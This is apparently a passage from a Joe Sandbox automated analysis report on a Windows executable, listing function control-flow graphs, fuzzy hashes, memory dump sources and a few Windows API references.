                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $7$7$8$W
                                                                                          • API String ID: 0-4210289531
                                                                                          • Opcode ID: cc922712c674694d451b58b033e683881c0778a8a13bf93cc21134ebbdb2add8
                                                                                          • Instruction ID: d8815ac2d70cd7c21f3ea330daadc819f6f20b7799c4c74fa91532e269c1b94c
                                                                                          • Opcode Fuzzy Hash: cc922712c674694d451b58b033e683881c0778a8a13bf93cc21134ebbdb2add8
                                                                                          • Instruction Fuzzy Hash: B981F87260C7808BD724CA3CC85535FBFD2ABD5324F1E8A6ED4E5873C2D67888058746
                                                                                          Function 004A15DC Relevance: 4.3, Strings: 3, Instructions: 561COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 815 4a15dc-4a15ec call 4a2240 818 4a176a-4a1775 815->818 819 4a15cc-4a15d4 815->819 820 4a1762-4a1765 815->820 821 4a14c3-4a14c8 815->821 822 4a15c0-4a15c3 815->822 823 4a14e5-4a1503 815->823 824 4a15ba 815->824 825 4a1999-4a19b2 call 4a5050 815->825 826 4a177c-4a1794 815->826 827 4a15f3-4a1669 call 492dd0 * 3 815->827 828 4a15b1 815->828 829 4a1551-4a156f 815->829 830 4a17b6-4a17cf 815->830 818->819 818->822 818->823 818->824 818->825 818->826 818->828 818->829 818->830 819->825 831 4a1821-4a184f 820->831 835 4a14ca-4a14d0 call 47c890 821->835 836 4a14d3-4a14d6 call 4ab7b0 821->836 822->819 837 4a1510-4a1547 823->837 854 4a19cb-4a19ff 825->854 855 4a19b4-4a19b5 825->855 833 4a17a0-4a17b2 826->833 874 4a1670-4a168f 827->874 828->824 839 4a1570-4a15aa 829->839 834 4a17d0-4a17fd 830->834 847 4a1850-4a1886 831->847 833->833 843 4a17b4 833->843 834->834 845 4a17ff 834->845 835->836 853 4a14db-4a14de 836->853 837->837 840 4a1549 837->840 839->839 844 4a15ac 839->844 840->829 850 4a1802-4a1808 843->850 844->828 845->850 847->847 852 4a1888-4a188d 847->852 861 4a180a-4a180b 850->861 862 4a181b-4a181e 850->862 856 4a188f-4a1896 852->856 857 4a18ad-4a18b0 852->857 853->823 853->829 860 4a1a00-4a1a43 854->860 859 4a19c0-4a19c9 855->859 865 4a18a0-4a18a9 856->865 866 4a18b3-4a18bc 857->866 859->854 859->859 860->860 867 4a1a45-4a1a4a 860->867 864 4a1810-4a1819 861->864 862->831 864->862 864->864 865->865 868 4a18ab 865->868 869 4a18db-4a191f 866->869 870 4a18be-4a18c1 866->870 872 4a1a4c-4a1a4d 867->872 873 4a1a5d 867->873 868->866 876 4a1920-4a195b 869->876 875 4a18d0-4a18d9 870->875 877 4a1a50-4a1a59 872->877 878 4a1a60-4a1a69 873->878 874->874 881 4a1691-4a1699 874->881 875->869 875->875 876->876 882 4a195d-4a1962 876->882 877->877 883 4a1a5b 877->883 879 4a1a7b 878->879 880 4a1a6b-4a1a6d 878->880 889 4a1a7e 879->889 884 4a1a70-4a1a79 880->884 885 4a169b-4a169f 881->885 886 4a16ad 881->886 887 4a197d 882->887 888 4a1964-4a1968 882->888 883->878 884->879 884->884 890 4a16a0-4a16a9 885->890 892 4a16b0-4a16b8 886->892 893 4a1980-4a1992 887->893 891 4a1970-4a1979 888->891 889->889 890->890 894 4a16ab 890->894 891->891 897 4a197b 891->897 895 4a16ba-4a16bb 892->895 896 4a16cb-4a16db 892->896 893->819 893->822 893->824 893->825 893->828 894->892 898 4a16c0-4a16c9 895->898 899 4a16fd-4a1700 896->899 900 4a16dd-4a16e4 896->900 897->893 898->896 898->898 902 4a1703-4a170c 899->902 901 4a16f0-4a16f9 900->901 901->901 903 4a16fb 901->903 904 4a170e-4a1715 902->904 905 4a172d 902->905 903->902 906 4a1720-4a1729 904->906 907 4a1733-4a173c 905->907 906->906 908 4a172b 906->908 909 4a174b-4a175b call 4b4320 907->909 910 4a173e-4a173f 907->910 908->907 909->818 909->819 909->820 909->822 909->823 909->824 909->825 909->826 909->828 909->829 909->830 912 4a1740-4a1749 910->912 912->909 912->912
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: >2%8$NFFV$]c\"
                                                                                          • API String ID: 0-36263332
                                                                                          • Opcode ID: a3d0304cc7e3a40def1825658326bbab0ba2cafd084bdbfda229e8f319f3e411
                                                                                          • Instruction ID: 2d561b42531285b061f51bc961fa656c28d97a9c364c5424ab32f6d1f29136a2
                                                                                          • Opcode Fuzzy Hash: a3d0304cc7e3a40def1825658326bbab0ba2cafd084bdbfda229e8f319f3e411
                                                                                          • Instruction Fuzzy Hash: 61F114745047828BD7258F2AC490723BBE2EFA7304F2C859EC4D68F7A2D7799806C765
                                                                                          Function 0047CF90 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 958 47cf90-47cfaf 959 47cfb0-47cfd3 958->959 959->959 960 47cfd5-47cfdf call 4aff20 959->960 963 47cfe5-47cfec call 4a8d10 960->963 964 47d1c4-47d1cf ExitProcess 960->964 967 47cff2-47d0a5 963->967 968 47d1bf call 4b0de0 963->968 971 47d0b0-47d0c2 967->971 968->964 971->971 972 47d0c4-47d0c7 971->972 973 47d0cd-47d101 972->973 974 47d19c-47d1a4 972->974 975 47d110-47d12d 973->975 978 47d1a6-47d1ab 974->978 979 47d1ac-47d1b3 call 47e1a0 974->979 975->975 977 47d12f-47d158 975->977 980 47d160-47d181 977->980 978->979 979->968 985 47d1b5 call 480b90 979->985 980->980 982 47d183-47d19b 980->982 982->974 988 47d1ba call 47fa70 985->988 988->968
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0047D1C7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID: 89
                                                                                          • API String ID: 621844428-155395596
                                                                                          • Opcode ID: eef272983cc2b26d5bfa48949e632927f892c540fd56c68c3b19bfbba45031bc
                                                                                          • Instruction ID: 705d0042d3bfdfdb8b90f59c70e884d1be2a8d3205016936bf44b78e70af1ffa
                                                                                          • Opcode Fuzzy Hash: eef272983cc2b26d5bfa48949e632927f892c540fd56c68c3b19bfbba45031bc
                                                                                          • Instruction Fuzzy Hash: A5519C62B5871017E318A6748C523BFABD1DF86318F198D2ED9C5EB3C2D92C8C058786
                                                                                          Function 0048D7F8 Relevance: 1.9, APIs: 1, Instructions: 413COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de512dc28ee53194ef31629311702fee87b15a939415f20c19ddd1b408c4b29d
                                                                                          • Instruction ID: 10bafb4872d25c585f06000d08e67fce3ea9b67786b1c4ba640033cb4d0fb38b
                                                                                          • Opcode Fuzzy Hash: de512dc28ee53194ef31629311702fee87b15a939415f20c19ddd1b408c4b29d
                                                                                          • Instruction Fuzzy Hash: 4DD134B59007008FD7249F29C881B67B7E2FF49314F18896ED49A8B792E738F801CB55
                                                                                          Function 0048104F Relevance: 1.6, APIs: 1, Instructions: 379COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoUninitialize.COMBASE(?,00000001,00000001,?,?,?,00000001,00000001,00000003,00000001,00000001,?,?,?,00000001,00000001), ref: 00481379
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Uninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 3861434553-0
                                                                                          • Opcode ID: 1c0a47e923f70dc2f627e9cfb60b62467db29b14926ed8260bf4ed431624d425
                                                                                          • Instruction ID: da6442765b1f2c49d11d91e5adecd8027053a5b048c37e7dd1843a5bb85abe4d
                                                                                          • Opcode Fuzzy Hash: 1c0a47e923f70dc2f627e9cfb60b62467db29b14926ed8260bf4ed431624d425
                                                                                          • Instruction Fuzzy Hash: AFB14BB5A103404BD710AF329CD266B77E6AF95318F08853DE84B4B783EB3DE815875A
                                                                                          Function 004AE210 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004AE2A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
